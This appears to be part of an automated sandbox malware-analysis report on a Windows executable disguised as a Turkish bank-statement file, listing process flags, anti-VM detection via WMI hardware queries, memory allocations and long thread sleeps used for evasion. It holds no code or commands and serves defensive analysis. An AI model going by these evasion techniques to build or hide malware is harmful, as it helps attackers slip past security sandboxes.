                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 5740, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 45B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 7C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 8DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 9DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 240000Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 239890Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 239781Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199891Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199777Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199656Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199547Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199437Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199328Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199219Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199000Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198891Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198779Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198672Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198562Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198453Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198343Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198234Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198120Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197993Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197875Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197765Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197656Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197547Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197422Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197312Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197203Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197083Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196953Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196843Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196734Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196625Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196515Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196403Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196297Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196187Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196078Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195969Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195844Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195700Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195592Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195482Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195375Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195266Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195156Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195019Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194891Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194766Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194641Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194531Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194422Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow / User API: threadDelayed 598Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow / User API: threadDelayed 967Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5665Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4022Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow / User API: threadDelayed 1561Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow / User API: threadDelayed 8285Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 2440Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 2440Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 2440Thread sleep time: -239890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 2440Thread sleep time: -239781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 6580Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4644Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1200000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199777s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1199000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1198891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1198779s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1198672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1198562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1198453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1198343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1198234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1198120s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197993s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1197083s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196843s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196403s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1196078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195700s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195592s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195482s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1195019s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1194891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1194766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1194641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1194531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340Thread sleep time: -1194422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 240000Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 239890Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 239781Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199891Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199777Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199656Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199547Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199437Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199328Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199219Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199000Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198891Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198779Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198672Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198562Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198453Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198343Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198234Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198120Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197993Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197875Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197765Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197656Jump to behavior
